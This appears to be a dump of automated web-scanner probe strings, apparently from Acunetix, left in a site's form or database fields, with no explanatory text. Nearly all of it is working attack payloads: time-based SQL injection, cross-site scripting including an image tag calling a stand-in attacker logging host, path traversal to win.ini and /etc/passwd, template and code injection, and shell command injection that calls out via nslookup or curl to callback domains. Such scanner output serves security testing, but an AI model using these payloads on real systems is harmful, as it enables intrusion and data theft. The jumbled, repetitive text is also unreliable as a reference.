".gethostbyname(lc("hitvr"."plukqmbu8be5c.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(65).chr(117).chr(72)."

&n928944=v932202

!(()&&!|*|*|

'"()

'.gethostbyname(lc('hitcc'.'qvxmgkincd89a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(111).chr(65).'

1spCh0ntO

Mr.

1

555


Mr.

1

555

bxss.me

1

555

Mr.

1

../../../../../../../../../../../../../../windows/win.ini


Mr.

1

../../../../../../../../../../../../../../windows/win.ini

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

1

555

Mr.

1

555

Mr.

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

"+"A".concat(70-3).concat(22*4).concat(97).concat(72).concat(117).concat(74)+(require"socket"

555

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(105).concat(71).concat(112).concat(72)+(require'socket'

Mr.

1

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(110).concat(69).concat(114).concat(71)+(require"socket"

Mr.

555


Mr.

555

Mr.

555

Mr.

555


Mr.

555

Mr.

1

555

Mr.

555


Mr.

555

".gethostbyname(lc("hitsi"."hliqvaic8ecae.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(77).chr(115).chr(76)."

555


".gethostbyname(lc("hitsi"."hliqvaic8ecae.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(77).chr(115).chr(76)."

555

'.gethostbyname(lc('hitvb'.'febxtyaje5204.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(75).chr(112).chr(74).'

555

Mr.

".gethostbyname(lc("hitgx"."iuufaxmy9c1b3.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(80).chr(118).chr(72)."

Mr.

1

555


Mr.

1

555

Mr.

'.gethostbyname(lc('hitqj'.'hiqtgefxac7fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(73).chr(104).chr(71).'

Mr.

555

@@jsJFM

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1RhMzTyQp')) OR 358=(SELECT 358 FROM PG_SLEEP(15))--

1i5ygKsrB') OR 90=(SELECT 90 FROM PG_SLEEP(15))--

11tsN9ILv' OR 971=(SELECT 971 FROM PG_SLEEP(15))--

1-1)) OR 488=(SELECT 488 FROM PG_SLEEP(15))--

1-1) OR 868=(SELECT 868 FROM PG_SLEEP(15))--

1-1 OR 94=(SELECT 94 FROM PG_SLEEP(15))--

1PTPTDViT')); waitfor delay '0:0:15' --

18gx3T0ZT'); waitfor delay '0:0:15' --

1smwUwEqP'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+191-191) --

-1" OR 3*2<(0+5+191-191) --

-1" OR 3+191-191-1=0+0+0+1 --

-1" OR 2+191-191-1=0+0+0+1 --

-1' OR 3*2>(0+5+90-90) or 'HqWK70BS'='

-1' OR 3*2<(0+5+90-90) or 'HqWK70BS'='

-1' OR 3+90-90-1=0+0+0+1 or 'HqWK70BS'='

-1' OR 2+90-90-1=0+0+0+1 or 'HqWK70BS'='

-1' OR 3*2>(0+5+257-257) --

-1' OR 3*2<(0+5+257-257) --

-1' OR 3+257-257-1=0+0+0+1 --

-1' OR 2+257-257-1=0+0+0+1 --

-1 OR 3*2>(0+5+553-553)

-1 OR 3*2<(0+5+553-553)

-1 OR 3+553-553-1=0+0+0+1

-1 OR 2+553-553-1=0+0+0+1

-1 OR 3*2>(0+5+733-733) --

-1 OR 3*2<(0+5+733-733) --

-1 OR 3+733-733-1=0+0+0+1 --

-1 OR 2+733-733-1=0+0+0+1 --

1

1

1<aHMWhMt<

1<img sRc='http://attacker-9644/log.php?

1<aZj1MeT x=9988>

1<ifRAme sRc=9667.com></IfRamE>

1<W6PFDQ>UJ73P[!+!]</W6PFDQ>

1GPTQd

1}body{zzz:Expre/**/SSion(VOPb(9146))}

1<avacARf<

1<img sRc='http://attacker-9416/log.php?

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<aRn8TSm x=9206>

1<input autofocus onfocus=VOPb(9003)>

1<ifRAme sRc=9453.com></IfRamE>

�<img zzz onmouseover=VOPb(93701) //�>

1&lt;ScRiPt&gt;VOPb(9081)&lt;/sCripT&gt;

1<WECH6Q>LVGTO[!+!]</WECH6Q>

1\u003CScRiPt\VOPb(9578)\u003C/sCripT\u003E

1vBbrN

<InvalidTag >ZDFU(9357)</ScRiPt>

%31%3C%53%63%52%69%50%74%20%3E%56%4F%50%62%289261%29%3C%2F%73%43%72%69%70%54%3E

1}body{zzz:Expre/**/SSion(ZDFU(9699))}

1<img/src=">" onerror=alert(9387)>

<a HrEF=jaVaScRiPT:>

1<img src=xyz OnErRor=VOPb(9768)>

1<img src=//xss.bxss.me/t/dot.gif onload=VOPb(9430)>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=ZDFU(9085)>

1<body onload=VOPb(9140)>

�<img zzz onmouseover=ZDFU(99971) //�>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9801'>

1&lt;ScRiPt&gt;ZDFU(9648)&lt;/sCripT&gt;

1<isindex type=image src=1 onerror=VOPb(9560)>

1\u003CScRiPt\ZDFU(9122)\u003C/sCripT\u003E

1<svg

%31%3C%53%63%52%69%50%74%20%3E%5A%44%46%55%289300%29%3C%2F%73%43%72%69%70%54%3E

1<InvalidTag

1<img/src=">" onerror=alert(9031)>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9064></ScRiPt>

1<img src=xyz OnErRor=ZDFU(9734)>

1<InvalidTag

1<img src=//xss.bxss.me/t/dot.gif onload=ZDFU(9126)>

1<body onload=ZDFU(9216)>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%56%4F%50%62%28%39%39%38%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>VOPb(9250)</script>9250

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9882'>

1<InvalidTag>VOPb(9478)</script>

1<isindex type=image src=1 onerror=ZDFU(9061)>

1<W5TD7C>R1TJR[!+!]</W5TD7C>

1<InvalidTag >VOPb(9865)</ScRiPt>

1<svg

� onload=ZDFU(9160);>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag

>ZDFU(9688)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9393></ScRiPt>

dfb__${98991*97996}__::.x

1<InvalidTag

>ZDFU(9280)</ScRiPt>

dfb[[${98991*97996}]]xca

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%44%46%55%28%39%32%38%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

dfb{{98991*97996}}xca

1<InvalidTag>ZDFU(9985)</script>9985

1<InvalidTag>ZDFU(9697)</script>

1<WE7QJF>QF0MW[!+!]</WE7QJF>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

1<InvalidTag >ZDFU(9043)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

bfgx8571%C0%BEz1%C0%BCz2a%90bcxhjl8571

dfb{{98991*97996}}xca

bfg5390%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5390

1

19754036

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'"()&%<zzz><InvalidTag >VOPb(9476)</ScRiPt>

1

1'"()&%<zzz><InvalidTag >VOPb(9024)</ScRiPt>

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

bfgx4605%C0%BEz1%C0%BCz2a%90bcxhjl4605

bfg2428%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2428

19544648

'"()&%<zzz><InvalidTag >ZDFU(9139)</ScRiPt>

1'"()&%<zzz><InvalidTag >ZDFU(9703)</ScRiPt>

@@EXUHK

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1w1Vyx4Jp')) OR 562=(SELECT 562 FROM PG_SLEEP(15))--

1DrEUL8Tx') OR 583=(SELECT 583 FROM PG_SLEEP(15))--

1dzrIZNFr' OR 735=(SELECT 735 FROM PG_SLEEP(15))--

1-1)) OR 687=(SELECT 687 FROM PG_SLEEP(15))--

1-1) OR 842=(SELECT 842 FROM PG_SLEEP(15))--

1-1 OR 122=(SELECT 122 FROM PG_SLEEP(15))--

1nwNwA1pZ')); waitfor delay '0:0:15' --

1YwTTS4nv'); waitfor delay '0:0:15' --

19Ilc0qI5'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:7.729' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1<aVlrrvI<

1<img sRc='http://attacker-9783/log.php?

1<aTjh3Iw x=9576>

1<ifRAme sRc=9712.com></IfRamE>

1<WJJTIY>FPK0F[!+!]</WJJTIY>

1NeTCl

<InvalidTag >skXf(9378)</ScRiPt>

1}body{zzz:Expre/**/SSion(skXf(9901))}

1-1; waitfor delay '0:0:15' --

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=skXf(9992)>

�<img zzz onmouseover=skXf(96851) //�>

1&lt;ScRiPt&gt;skXf(9340)&lt;/sCripT&gt;

1\u003CScRiPt\skXf(9957)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%73%6B%58%66%289781%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9318)>

1<img src=xyz OnErRor=skXf(9128)>

1<img src=//xss.bxss.me/t/dot.gif onload=skXf(9121)>

1<body onload=skXf(9394)>

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9603'>

WEB-INF\web.xml

1<isindex type=image src=1 onerror=skXf(9184)>

WEB-INF/web.xml

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1<svg

� onload=skXf(9272);>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<InvalidTag

>skXf(9744)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9097></ScRiPt>

1<InvalidTag

>skXf(9049)</ScRiPt>

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%73%6B%58%66%28%39%36%31%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1<InvalidTag>skXf(9306)</script>9306

/../../../../../../../../../../boot.ini

1<InvalidTag>skXf(9492)</script>

../../../../../../../../../../windows/win.ini%00.jpg

1<WXPBWJ>9TPGX[!+!]</WXPBWJ>

C:\WINDOWS\system32\drivers\etc\hosts

file:///etc/passwd

1<InvalidTag >skXf(9495)</ScRiPt>

../../../../../../../../../../../../../../windows/win.ini

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

../../../../../../../../../../../../../../etc/passwd

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

;(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)|(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)&(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)

dfb{{98991*97996}}xca

`(nslookup -q=cname hitwrreppuwznb99e5.bxss.me||curl hitwrreppuwznb99e5.bxss.me)`

bxss.me

|(nslookup -q=cname hitdlnpcmhjhcca67b.bxss.me||curl hitdlnpcmhjhcca67b.bxss.me)

c:/windows/win.ini

&(nslookup -q=cname hitdqwmwsvomc80983.bxss.me||curl hitdqwmwsvomc80983.bxss.me)&'\"`0&(nslookup -q=cname hitdqwmwsvomc80983.bxss.me||curl hitdqwmwsvomc80983.bxss.me)&`'

1

&nslookup -q=cname hittnkgorxiosf09e7.bxss.me&'\"`0&nslookup -q=cname hittnkgorxiosf09e7.bxss.me&`'

/etc/shells

$(nslookup -q=cname hitzcrxqgxqkc87e71.bxss.me||curl hitzcrxqgxqkc87e71.bxss.me)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

(nslookup -q=cname hitzzvoydgeubadc8f.bxss.me||curl hitzzvoydgeubadc8f.bxss.me))

1

http://bxss.me/t/fit.txt%3F.jpg

|echo ghcmwc$()\ fdrvzu\nz^xyu||a #' |echo ghcmwc$()\ fdrvzu\nz^xyu||a #|" |echo ghcmwc$()\ fdrvzu\nz^xyu||a #

Http://bxss.me/t/fit.txt

&echo nphgur$()\ dwtxcs\nz^xyu||a #' &echo nphgur$()\ dwtxcs\nz^xyu||a #|" &echo nphgur$()\ dwtxcs\nz^xyu||a #

echo ixbxrn$()\ yikqln\nz^xyu||a #' &echo ixbxrn$()\ yikqln\nz^xyu||a #|" &echo ixbxrn$()\ yikqln\nz^xyu||a #

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

<th:t="${dfb}#foreach

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1*if(now()=sysdate(),sleep(15),0)

1

<%={{={@{#{${dfb}}%>

bfgx4076%C0%BEz1%C0%BCz2a%90bcxhjl4076

bfg5358%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5358

19663720

/\xfs.bxss.me?hkbakels.com.hk

'"()&%<zzz><InvalidTag >skXf(9513)</ScRiPt>

<!--

//xfs.bxss.me?hkbakels.com.hk

1'"()&%<zzz><InvalidTag >skXf(9864)</ScRiPt>

xfs.bxss.me?hkbakels.com.hk

http://xfs.bxss.me?hkbakels.com.hk

'"


992339

xfs.bxss.me

-1" OR 3+11-11-1=0+0+0+1 --


-1" OR 2+11-11-1=0+0+0+1 --




-1' OR 3*2>(0+5+40-40) or 'sHKT5KqI'='

-1' OR 3*2<(0+5+40-40) or 'sHKT5KqI'='

"+response.write(9861255*9591349)+"



-1' OR 3+40-40-1=0+0+0+1 or 'sHKT5KqI'='

'+response.write(9861255*9591349)+'

response.write(9861255*9591349)

19900370

/\xfs.bxss.me?hkbakels.com.hk

-1' OR 2+40-40-1=0+0+0+1 or 'sHKT5KqI'='

'+'A'.concat(70-3).concat(22*4).concat(122).concat(83).concat(97).concat(80)+(require'socket'

Socket.gethostbyname('hitos'+'eadopghp2543f.bxss.me.')[3].to_s)+'

'"()&%<zzz><InvalidTag >skXf(9371)</ScRiPt>

//xfs.bxss.me?hkbakels.com.hk

-1' OR 3*2>(0+5+349-349) --

"+"A".concat(70-3).concat(22*4).concat(119).concat(70).concat(113).concat(66)+(require"socket"

Socket.gethostbyname("hitle"+"hnqpeeid8d313.bxss.me.")[3].to_s)+"

<!--

1'"()&%<zzz><InvalidTag >skXf(9180)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


-1' OR 3*2<(0+5+349-349) --

'"

xfs.bxss.me?hkbakels.com.hk

bxss.me/t/xss.html?%00

-1' OR 3+349-349-1=0+0+0+1 --



-1' OR 2+349-349-1=0+0+0+1 --

http://xfs.bxss.me?hkbakels.com.hk


938703

HttP://bxss.me/t/xss.html?%00

xfs.bxss.me

-1 OR 3+684-684-1=0+0+0+1


-1 OR 2+684-684-1=0+0+0+1

'+'A'.concat(70-3).concat(22*4).concat(103).concat(85).concat(103).concat(90)+(require'socket'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

bxss.me

"||sleep(27*1000)*totlzc||"

c:/windows/win.ini

${9999625+10000479}

-1 OR 3*2<(0+5+210-210) --

'||sleep(27*1000)*rafyke||'

"+"A".concat(70-3).concat(22*4).concat(106).concat(89).concat(97).concat(84)+(require"socket"

bxss.me/t/xss.html?%00

'.print(md5(31337)).'

HttP://bxss.me/t/xss.html?%00

-1 OR 3+210-210-1=0+0+0+1 --

WEB-INF\web.xml

${@print(md5(31337))}\

/etc/shells

http://bxss.me/t/fit.txt%3F.jpg

"&&sleep(27*1000)*cadepp&&"

"+response.write(9817628*9295121)+"

WEB-INF/web.xml

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.